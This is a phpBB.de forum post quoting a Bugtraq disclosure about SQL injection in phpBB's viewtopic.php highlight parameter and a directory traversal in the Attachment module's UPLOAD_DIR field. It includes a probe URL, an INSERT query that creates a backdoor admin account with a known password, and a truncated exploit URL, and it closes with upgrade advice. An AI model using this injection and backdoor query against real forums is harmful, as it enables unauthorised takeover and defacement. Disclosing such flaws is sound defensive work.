phpBB.de

Code: Alles auswählen

From: zee@psybnc.it
To: bugtraq@securityfocus.com
Subject: Phpbb id: 10701 update and Attachmodule add-on Directory Traversal

Phpbb: All vulnerable all except 2.0.11
Attachment module: All version vulnerable 
Howdark update opened wide my eyes with his nice exploit: 
Bugtraq id: 10701 
-----
viewtopic.php?t=1&highlight=%2527
----- 
Looking at the code I saw that was possible inject any type of Sql query with a multiple char() functions. 
The following code can add an username with admin rights executing this query: 
INSERT INTO phpbb_users(user_id,user_active,username,user_password,user_level) VALUES ('99999','1','ze3lock','ba3c83348bddf7b368b478ac06d3340e','1') 
And will be added to phpbb_users a new user with admin rights. 
*Note we can only execute a working query if we know the tables name. If not we can't. So this work only with a standard installation (usually 95% of websites ;-) 
username: ze3lock
pass: thepass 
The exploit can be run without being logged in and then you can have access with username. So it's quite simple to make it part of a script that could make backdoors around the web. 
For make it working just use the id of a working thread (in this case the thread is 30 - you can see it from the message) 
--- Code start ---- 
http://site.com/forum/viewtopic.php?t=30&highlight=%2527%252emysql_query.....usw.....usw.....usw.... 
--- code end --- 
------------ Attach Module ---------------- 

In the attach module, I found a directory traversal in the "UPLOAD_DIR" field. 
This is the directory where all attachments are supposted to be uploaded. 
The field accept any kind of character so you can put instead of 'files' '../../' and all the attachments will be uploaded in the '../..? directory. 
That's really dangerous for defacements threat. 

--------------- Suggestion ------------------ 
Please, upgrade to version 2.0.11 and add an input validation to UPLOAD_DIR field in attach module. 
Zeelock